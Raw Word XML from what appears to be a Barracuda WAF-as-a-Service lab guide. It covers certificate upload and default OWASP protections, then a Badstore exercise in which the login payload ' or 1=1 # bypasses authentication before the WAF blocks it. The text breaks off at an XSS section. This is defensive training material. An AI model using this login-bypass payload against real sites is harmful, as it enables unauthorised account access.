          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="19C0989E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="19C0989E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">upload your own certificate and private </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="19C0989E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>key by</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="19C0989E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="58D20A70">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">simply </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="19C0989E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>editing the HTTPS endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="0A0DB5D2">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and pasting them in.</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="199A9516">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="42028494">
        <w:drawing>
          <wp:inline wp14:editId="05CB6DF5" wp14:anchorId="79CDB271">
            <wp:extent cx="5286375" cy="3911917"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="178042517" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rcd5fb62018154866">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5286375" cy="3911917"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="50C40F79" w:rsidRDefault="50C40F79" w14:paraId="6771A25E" w14:textId="3358A818">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0AB6FA65" w:rsidP="50C40F79" w:rsidRDefault="0AB6FA65" w14:paraId="353B23BF" w14:textId="1AE540A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="0AB6FA65">
        <w:rPr/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="3BD5D8D3">
        <w:rPr/>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="0AB6FA65">
        <w:rPr/>
        <w:t xml:space="preserve">ote on </w:t>
      </w:r>
      <w:r w:rsidR="2CB00A22">
        <w:rPr/>
        <w:t>Default Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90E1A" w:rsidRDefault="00BB1043" w14:paraId="3DDEE175" w14:textId="5C50E2FA">
      <w:r w:rsidR="142DB374">
        <w:rPr/>
        <w:t xml:space="preserve"> Most </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:rPr/>
        <w:t xml:space="preserve">of the OWASP Top 10 is </w:t>
      </w:r>
      <w:r w:rsidR="62A80151">
        <w:rPr/>
        <w:t xml:space="preserve">enabled </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:rPr/>
        <w:t xml:space="preserve">by default, </w:t>
      </w:r>
      <w:r w:rsidR="66179E50">
        <w:rPr/>
        <w:t xml:space="preserve">for example </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:rPr/>
        <w:t xml:space="preserve">SQL Injection and Cross-Site Scripting </w:t>
      </w:r>
      <w:r w:rsidR="40218343">
        <w:rPr/>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="6C4454F7">
        <w:rPr/>
        <w:t>enabled. T</w:t>
      </w:r>
      <w:r w:rsidR="00771436">
        <w:rPr/>
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidR="63ECEFC1">
        <w:rPr/>
        <w:t xml:space="preserve">may be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="63ECEFC1">
        <w:rPr/>
        <w:t>changed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="63ECEFC1">
        <w:rPr/>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidR="278A79C6">
        <w:rPr/>
        <w:t>necessary,</w:t>
      </w:r>
      <w:r w:rsidR="63ECEFC1">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="63ECEFC1">
        <w:rPr/>
        <w:t xml:space="preserve">site-wide or </w:t>
      </w:r>
      <w:r w:rsidR="63ECEFC1">
        <w:rPr/>
        <w:t>per-URL or per-Parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00092C9C" w:rsidRDefault="00F90E1A" w14:paraId="0973A661" w14:textId="60E4A01A">
      <w:r w:rsidR="00F90E1A">
        <w:drawing>
          <wp:inline wp14:editId="0859951C" wp14:anchorId="084B187F">
            <wp:extent cx="5943600" cy="3284855"/>
            <wp:effectExtent l="0" t="0" r="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ed91467077ad4b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284855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90E1A" w:rsidRDefault="00F90E1A" w14:paraId="4C59D18C" w14:textId="77777777"/>
    <w:p w:rsidR="00F90E1A" w:rsidRDefault="00F90E1A" w14:paraId="771BC104" w14:textId="77777777">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003048C0" w:rsidP="003048C0" w:rsidRDefault="003048C0" w14:paraId="51F92132" w14:textId="313AAEE2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="67A48E8C">
        <w:rPr/>
        <w:t xml:space="preserve">Finding a </w:t>
      </w:r>
      <w:r w:rsidR="003048C0">
        <w:rPr/>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="466AAC3A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="033148C7">
        <w:rPr/>
        <w:t>Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5ED453FE" w:rsidP="50C40F79" w:rsidRDefault="5ED453FE" w14:paraId="4D36146A" w14:textId="673EDD12">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5ED453FE">
        <w:rPr/>
        <w:t>Hackers may be able to easily bypass user logins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20A567D5" w:rsidP="3DB4835F" w:rsidRDefault="20A567D5" w14:paraId="1932EE82" w14:textId="5008C238">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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20A567D5">
        <w:rPr/>
        <w:t>In your web browser, g</w:t>
      </w:r>
      <w:r w:rsidR="2DCF93AE">
        <w:rPr/>
        <w:t>o to</w:t>
      </w:r>
      <w:r w:rsidR="185D9422">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1680462E">
        <w:rPr/>
        <w:t>your Badstore Domain Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390F68" w:rsidP="50C40F79" w:rsidRDefault="00390F68" w14:paraId="0F3D5E16" w14:textId="6359AFA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5CCB9076">
        <w:rPr/>
        <w:t>You will see you are an Unregistered User</w:t>
      </w:r>
      <w:r w:rsidR="6D0FFCD1">
        <w:rPr/>
        <w:t xml:space="preserve"> as shown near the top of the web page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390F68" w:rsidP="50C40F79" w:rsidRDefault="00390F68" w14:paraId="1D403697" w14:textId="674FEC69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00390F68">
        <w:rPr/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00B17B43">
        <w:rPr/>
        <w:t xml:space="preserve">lick Login / </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B17B43">
        <w:rPr/>
        <w:t xml:space="preserve">Register, </w:t>
      </w:r>
      <w:r w:rsidR="00357709">
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00357709">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4BFE6576">
        <w:rPr/>
        <w:t>enter</w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t>' or 1=1 #</w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:rPr/>
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">email </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">address, </w:t>
      </w:r>
      <w:r w:rsidR="00442916">
        <w:rPr/>
        <w:t>then</w:t>
      </w:r>
      <w:r w:rsidR="00442916">
        <w:rPr/>
        <w:t xml:space="preserve"> click </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">Login.  </w:t>
      </w:r>
      <w:r w:rsidR="1BB67E85">
        <w:drawing>
          <wp:inline wp14:editId="16B6345C" wp14:anchorId="2C83DCA5">
            <wp:extent cx="4096424" cy="2021953"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="651647086" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R284f5890ccd448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96424" cy="2021953"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00683ACD" w:rsidP="3DB4835F" w:rsidRDefault="006C796E" w14:paraId="4B49A9BA" w14:textId="3FEB5CBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="12920200">
        <w:rPr/>
        <w:t>This SQL Injection will succeed, and y</w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">ou will </w:t>
      </w:r>
      <w:r w:rsidR="7C4D17AF">
        <w:rPr/>
        <w:t xml:space="preserve">see near the top of the web page that you are </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t>logged in as the “Test User” without knowing their real email address or password</w:t>
      </w:r>
      <w:r w:rsidR="5FD7A9D6">
        <w:rPr/>
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidR="459A653D">
        <w:rPr/>
        <w:t>prove</w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t>s a simple SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="20E04F25">
        <w:rPr/>
        <w:t xml:space="preserve"> vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="39208A0E">
        <w:rPr/>
        <w:t xml:space="preserve">exists </w:t>
      </w:r>
      <w:r w:rsidR="20E04F25">
        <w:rPr/>
        <w:t>on this website.</w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0C094638">
        <w:drawing>
          <wp:inline wp14:editId="4D031665" wp14:anchorId="676ABCC9">
            <wp:extent cx="3143250" cy="1677408"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1118009212" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rb955e330432b4a8e">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3143250" cy="1677408"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00822AE6" w:rsidP="50C40F79" w:rsidRDefault="00ED048B" w14:paraId="3DF06DAA" w14:textId="6F3A71B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="25D99BA7">
        <w:rPr/>
        <w:t>Blocking a SQL Injection Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00822AE6" w:rsidP="50C40F79" w:rsidRDefault="00ED048B" w14:paraId="65B64A23" w14:textId="381105F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:r w:rsidR="67EE9664">
        <w:rPr/>
        <w:t xml:space="preserve">we will </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">try the same </w:t>
      </w:r>
      <w:r w:rsidR="0EE8D197">
        <w:rPr/>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0EE8D197">
        <w:rPr/>
        <w:t xml:space="preserve">Injection, </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">but this time </w:t>
      </w:r>
      <w:r w:rsidR="396B91D6">
        <w:rPr/>
        <w:t>through the WAFaaS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00822AE6" w:rsidP="50C40F79" w:rsidRDefault="00ED048B" w14:paraId="2778B107" w14:textId="7EFCDDCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="396B91D6">
        <w:rPr/>
        <w:t xml:space="preserve">In your browser, </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:rPr/>
        <w:t xml:space="preserve">go to your </w:t>
      </w:r>
      <w:r w:rsidR="007333E7">
        <w:rPr/>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:r w:rsidR="579536E4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="01B1946E">
        <w:rPr/>
        <w:t>CNAME</w:t>
      </w:r>
      <w:r w:rsidR="579536E4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008734F6">
        <w:rPr/>
        <w:t>https://app####.prod.cudawaas.com</w:t>
      </w:r>
      <w:r w:rsidR="007333E7">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00822AE6" w:rsidP="50C40F79" w:rsidRDefault="00ED048B" w14:paraId="02731955" w14:textId="0329BBE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="56393BCB">
        <w:rPr/>
        <w:t>Follow the same steps as before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00822AE6" w:rsidP="50C40F79" w:rsidRDefault="00ED048B" w14:paraId="3C1815B0" w14:textId="08B8850B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00822AE6">
        <w:rPr/>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidR="008734F6">
        <w:rPr/>
        <w:t xml:space="preserve">should </w:t>
      </w:r>
      <w:r w:rsidR="00822AE6">
        <w:rPr/>
        <w:t xml:space="preserve">get a block page because the WAFaaS </w:t>
      </w:r>
      <w:r w:rsidR="159E5C3B">
        <w:rPr/>
        <w:t xml:space="preserve">blocks the </w:t>
      </w:r>
      <w:r w:rsidR="00822AE6">
        <w:rPr/>
        <w:t>SQL injection attack</w:t>
      </w:r>
      <w:r w:rsidR="4552CDEE">
        <w:rPr/>
        <w:t>, and this attack never makes it to the web server.</w:t>
      </w:r>
      <w:r w:rsidR="6C021056">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00ED048B">
        <w:drawing>
          <wp:inline wp14:editId="10C0DE6E" wp14:anchorId="3383FD9B">
            <wp:extent cx="4952998" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture 21" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 21"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R87d740f360624f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1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A902BF" w:rsidP="3DB4835F" w:rsidRDefault="0000459B" w14:paraId="5FA85127" w14:textId="7B89D437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00A902BF">
        <w:rPr/>
        <w:t xml:space="preserve">Go to the Logs component, choose firewall logs, and you will see the log entry with the event ID </w:t>
      </w:r>
      <w:r w:rsidR="00D57F67">
        <w:rPr/>
        <w:t xml:space="preserve">and details of the SQL Injection attack </w:t>
      </w:r>
      <w:r w:rsidR="00A902BF">
        <w:rPr/>
        <w:t>as shown here</w:t>
      </w:r>
      <w:r w:rsidR="14363DF3">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0000459B">
        <w:drawing>
          <wp:inline wp14:editId="36152EBA" wp14:anchorId="58F74A8F">
            <wp:extent cx="4953000" cy="928370"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="17" name="Picture 17" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 17"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Ra4431f2c94124a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53000" cy="928370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0000459B" w:rsidRDefault="0000459B" w14:paraId="50AEE824" w14:textId="610C9A79">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0000459B" w:rsidRDefault="0000459B" w14:paraId="3B8EF54A" w14:textId="77777777"/>
    <w:p w:rsidR="007333E7" w:rsidP="00F90E1A" w:rsidRDefault="007333E7" w14:paraId="409BA73E" w14:textId="0A59C9A3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="3364FC50">
        <w:rPr/>
        <w:t xml:space="preserve">Blocking </w:t>
      </w:r>
      <w:r w:rsidR="007333E7">
        <w:rPr/>
        <w:t xml:space="preserve">Cross-Site Scripting </w:t>
      </w:r>
      <w:r w:rsidR="7585BB05">
        <w:rPr/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="007333E7">
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="60184D0B">
        <w:rPr/>
        <w:t xml:space="preserve">lso known as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007333E7">
        <w:rPr/>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="7585BB05">
        <w:rPr/>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="006B1901" w:rsidP="50C40F79" w:rsidRDefault="006B1901" w14:paraId="4F5CA8D9" w14:textId="4DD9667E">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="7585BB05">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="006B1901">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">People are complaining they are getting viruses and strange behavior when they go to </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="55A69C83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">our </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="64D12C73">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="006B1901">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>ebsite</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="006B1901">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">. They are not going to shop with </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="3F61194C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="006B1901">
        <w:rPr>
